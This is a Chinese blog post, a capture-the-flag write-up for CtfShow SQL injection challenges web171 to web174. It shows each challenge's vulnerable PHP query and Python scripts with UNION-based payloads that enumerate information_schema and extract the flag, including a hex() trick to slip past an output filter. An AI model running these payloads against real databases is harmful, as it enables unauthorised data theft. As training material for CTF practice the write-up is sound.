前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >CtfShow之SQL注入-持续更新

CtfShow之SQL注入-持续更新

作者头像
用户2616264
发布于 2023-05-18 03:32:39
发布于 2023-05-18 03:32:39
36500
代码可运行
举报
文章被收录于专栏:penetrationpenetration
运行总次数:0
代码可运行

CtfShow之SQL注入

web171

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
查询语句
//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#无过滤的字符型注入。
import requests
url = "http://66e1d748-4475-4aa9-8c95-fb3737690e46.challenge.ctf.show/api/?id="
# 查数据库
tablename = "-1' union select 1,2,group_concat(table_name) from information_schema.tables  where table_schema=database() --+"
# 查列名
columnname = "-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+"
# 查数据
payload = "-1' union select id,username,password from ctfshow_user --+"
res = requests.get(url+payload)
print(res.text)

web172

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if($row->username!=='flag'){
    $ret['msg']='查询成功';
}
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#无过滤的字符型注入,添加了条件限制 username!='flag'
import requests
url = "http://669d6879-73f9-4a49-97ac-56ca927f63b2.challenge.ctf.show/api/v2.php?id="
tablename = "0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+"
columnname = "0' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' --+"
payload = "0' union select 1,(select password from ctfshow_user2 where username='flag') --+"
res = requests.get(url+payload)
print(res.text)

web173

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
过滤了字符类型的注入,添加了检查结果中是否匹配正则表达式/flag/i
使用hex函数绕过正则过滤
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
import requests
url = "http://8926a547-bbc7-4a5b-a20a-215fdc2c4037.challenge.ctf.show/api/v3.php?id="
tablename = "-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+"
columnname = "-1' union select 1,2,hex((select group_concat(column_name) from information_schema.columns where table_name = 'ctfshow_user3')) --+"
payload = "-1' union select 1,2,hex((select password from ctfshow_user3 where username='flag')) --+"
res = requests.get(url+payload)
print(res.text)

web174

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022/10/19 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
【说站】php文件用什么软件打开
这是PHP最传统、最主要的目标领域。PHP解析器、网络服务器和网络浏览器需要以下三点。PHP代码在服务器上运行,结果以纯HTML形式返回浏览器。
很酷的站长
2022/11/23
2.6K0
【说站】php文件用什么软件打开
Kali利用Android木马渗透手机(高级篇)
选择网关 add to target 1 选择目标 add to target 2
院长技术
2021/02/19
18.1K0
Kali利用Android木马渗透手机(高级篇)
kali Linux外网渗透控制Android安卓手机系统。
就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->
知识与交流
2024/03/11
1.3K0
kali Linux外网渗透控制Android安卓手机系统。
Metasploit 学习记录
一直在用 Metasploit,但是从来没有花时间仔细去研究这个工具,最近得空就系统的研究研究,故于此记录之。
小简
2023/01/04
2.3K0
Metasploit 学习记录
QPython,一个在手机上运行Python的神器
之前安利过一款手机上运行Python的神器Termux,不过Termux的使用比较重,它实际是一款linux系统模拟器,安装好Termux后还要再安装python,并且是全命令行操作,一些读者使用起来有障碍。今天安利一款更友好的QPython。
一墨编程学习
2019/06/17
9.6K0
QPython,一个在手机上运行Python的神器
使用MLC-LLM将RWKV 3B模型跑在Android手机上(redmi k50每s可解码8个token
这篇文章主要是填一下 MLC-LLM 部署RWKV World系列模型实战(3B模型Mac M2解码可达26tokens/s) 这里留下来的坑,这篇文章里面介绍了如何使用 MLC-LLM 在A100/Mac M2上部署 RWKV 模型。但是探索在Android端部署一个RWKV对话模型的app时却碰到了诸多问题,解决的周期也很长,之前留了issue在MLC-LLM的repo,这周@chentianqi大佬回复说之前编译出的app会在模型初始化阶段卡住的问题已经解决了,所以我又重新开始踩了一些坑最终完成了在手机上运行RWKV World4 3B模型的目的。这里把踩的坑和Android编译方法都描述一下。
BBuf
2023/10/30
1.3K1
使用MLC-LLM将RWKV 3B模型跑在Android手机上(redmi k50每s可解码8个token
免root将手机(Android&IOS)改造成移动渗透神器
渗透测试人员都习惯一台笔记本走天下,但有的时候笔记本还是太大,一些地方用笔记本做渗透测试还是太招摇,而且有的时候也不会随身都带笔记本。这时如果可以利用随身携带的手机进行渗透,想想都很酷。众所周知,手机版的kali就是Kali NetHunter,但这神器一是要刷机,二是适配的手机非常少,三是即使刷成功了,那你手机上原来的各种软件就不那么好用了。今天跟大家分享一下如何在手机(Android&IOS)上不刷机、免root安装nmap、sqlmap、msf等工具,将手机改造成移动渗透利器。
tinyfisher
2019/11/20
9.9K0
免root将手机(Android&IOS)改造成移动渗透神器
多款廉价Android手机再曝固件后门,联想手机也在其列
之前我们报道过两起Android手机暗藏漏洞的事件,而周一,来自俄罗斯杀软厂商Dr.Web(大蜘蛛)的研究人员又发现了暗藏漏洞的现象。 研究人员们发现,某些廉价的Android智能手机和平板中内置了恶意的固件,这些固件会从手机上收集数据,在软件上覆盖广告,还能下载一些无用的软件APK。 研究员调查了俄罗斯市场中销售的MTK平台手机,发现了固件中存在的两种downloader木马。 这两个木马被命名为Android.DownLoader.473.origin和Android.Sprovider.7。他
FB客服
2018/02/09
1.5K0
多款廉价Android手机再曝固件后门,联想手机也在其列
解锁新技能:Android手机+Termux搭建MariaDB打造高效开发环境
在这个数字化飞速发展的时代,我们的手机早已不再局限于通话、短信或社交娱乐的范畴了。事实上,智能手机的强大性能已经足以支持我们完成许多复杂的任务,比如编写代码、运行脚本甚至是搭建小型服务器!想象一下,在你口袋里的那台Android设备上安装一个强大的数据库系统,并通过公网实现远程访问——这听起来是不是很酷呢?
FGGIT
2025/01/14
1280
解锁新技能:Android手机+Termux搭建MariaDB打造高效开发环境
如何利用手机木马远程控制
2.4 对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:
知识与交流
2021/04/02
9.2K1
如何利用手机木马远程控制
安卓Termux搭建web服务器【公网远程手机Android服务器】
Termux是一个Android终端仿真应用程序,用于在 Android 手机上搭建一个完整的Linux 环境,能够实现Linux下的许多基本操作,不需要root权限Termux就可以正常运行。
命运之光
2024/03/20
1.3K0
安卓Termux搭建web服务器【公网远程手机Android服务器】
基于Termux打造Android手机渗透神器
Termux是一款开源且不需要root,运行在Android终端上极其强大的linux模拟器,支持apt管理软件包,完美支持python,ruby,go,nodejs。本文使用termux搭建Nmap、Sqlmap、BBScan、subDomainsBrute、Hydra、RouterSploit等实现支持端口扫描、注入检测、子域名爆破、多协议弱口令爆破、路由器漏洞检测框架多种功能的Android手机渗透神器。
HACK学习
2019/08/06
7.4K0
基于Termux打造Android手机渗透神器
教程 | 如何在手机上使用TensorFlow
翻译 | AI科技大本营 参与 | zzq 审校 | reason_W 我们知道,TensorFlow是一个深度学习框架,它通常用来在服务器上训练需要大量数据的大模型。随着智能手机的普及,人们也越来越
AI科技大本营
2018/04/26
2.6K0
教程 | 如何在手机上使用TensorFlow
如何使用Metasploit对安卓手机进行控制
文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。 在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。 创建负载
FB客服
2018/02/08
3.9K0
如何使用Metasploit对安卓手机进行控制
SpyNote V5.0图形化工具远程管理Android手机教程(附视频)
前言 本篇文章主要以图文教程和视频演示详细地教你如何快速学会使用SpyNote 5.0图形化工具来穿透内网远程控制Android手机。本教程有一定的杀伤力,请各位Freebuf小粉合理使用。(切勿用于
FB客服
2018/03/22
6.6K5
SpyNote V5.0图形化工具远程管理Android手机教程(附视频)
黑客玩具入门——4、漏洞扫描与Metasploit
Legion是Sparta的一个分支,它是一个开源的、易于使用的、超级可扩展的、半自动的网络渗透测试框架。它是一款Kali Linux系统默认集成的Python GUI应用程序工具。Legion是一个Nmap、Nikto、Hydra等工具的集合,利用各个工具的优秀功能,完成收集信息、扫描和爆破等任务。
zaking
2023/12/01
2.5K0
黑客玩具入门——4、漏洞扫描与Metasploit
史上最强内网渗透知识点总结
文章内容没谈 snmp 利用,可以去乌云等社区获取,没有后续内网持久化,日志处理等内容。
信安之路
2018/08/08
9.2K0
记一次内网渗透(二)
在上一节《记一次基础的Vulnstack渗透经验分享》中,我们简单的对vulnstack 1的靶场环境做了一次测试,通过外网初探、信息收集、攻入内网最终拿下域控,整个流程算是比较顺利,毕竟这个靶场环境比较基础。如今,vulnstack系列的内网渗透靶场已经发布了六个,在本节中,我们将对vulnstack 4这个靶场进行渗透测试。靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/
HACK学习
2021/03/21
1.7K0
神器Termux的使用记录
Termux是一个Android终端模拟器和Linux环境应用程序,可以直接使用,无需root或设置。自动安装最小基本系统 - 使用APT包管理器可以使用其他软件包。
Bess Croft
2020/04/03
8.3K0
无文件落地攻击
所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法,常用于逃避传统的安全检测机制,本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。
Al1ex
2021/07/21
2.1K0
无文件落地攻击
相关推荐
【说站】php文件用什么软件打开
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验